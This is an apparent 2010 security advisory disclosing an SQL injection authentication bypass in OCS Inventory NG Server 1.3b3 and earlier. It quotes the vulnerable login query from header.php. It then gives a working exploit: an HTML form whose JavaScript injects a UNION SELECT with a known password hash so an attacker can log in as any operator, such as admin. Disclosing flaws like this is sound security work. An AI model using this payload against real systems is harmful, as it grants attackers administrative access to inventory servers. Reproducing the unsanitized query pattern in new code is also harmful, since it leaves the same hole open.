OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass

Nicolas DEROUET <nicolas.derouet@xxxxxxxxx> · Fri, 29 Jan 2010 10:08:52 +0100

OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass

Software      : Open Computer and Software (OCS) Inventory NG
Download      : http://www.ocsinventory-ng.org/
Discovered by : Nicolas DEROUET (nicolas.derouet[gmail]com)
Version       : 1.03-beta3 and prior
Impact        : Critical
Remote        : Yes (No authentication is needed)

== Description ==

Open Computer and Software (OCS) Inventory Next Generation (NG) is an
application designed to help a network or system administrator keep track
of the computers configuration and software that are installed on the network.

The vulnerability is a sql injection which exists in header.php file.
Attacker could pass a special sql string which can used to create/modify
information stored in the database or authenticated in any user.

script : header.php

102 if(isset($_POST["login"])) {
103   $req="SELECT id, accesslvl, passwd FROM operators WHERE
id='".$_POST["login"]."'";
104   $res=mysql_query($req,$_SESSION["readServer"]) or die(mysql_error());
105
106   if($row=@mysql_fetch_object($res))
107   {
108     // DL 25/08/2005
109     // Support new MD5 encrypted password or old clear password
for login only
110     if (($row->passwd != md5( $_POST["pass"])) and
111         ($row->passwd != $_POST["pass"])) {

== Exploit ==

<script>
  function inject()
  {
    document.getElementById('log').action =
document.getElementById('ocsreports').value + 'index.php';
    sql = "0' UNION SELECT id, accesslvl,
'a181b4673216ad247a0f78066a9646e1' FROM operators WHERE id='"
    document.getElementById('login').value = sql +
document.getElementById('user').value;
    document.getElementById('pass').value = "inject";
  }
</script>
<form name="log" id="log" action="" method="post">
  <table border="0" width="450px">
  <tr>
    <td><b>OCSReports :</b></td>
    <td><input type="text" id="ocsreports" size="40"
value="http://127.0.0.1/ocsreports/"; /></td>
  </tr>
  <tr>
    <td><b>Login :</b></td>
    <td><input type="text" id="user" size="40" value="admin" /></td>
  </tr>
  <tr>
    <td><input type="hidden" name="login" id="login" />
        <input type="hidden" name="pass"  id="pass"  /></td>
    <td><input type="submit" name="subLogin" onclick="inject();"></td>
  </tr>
  </table>
</form>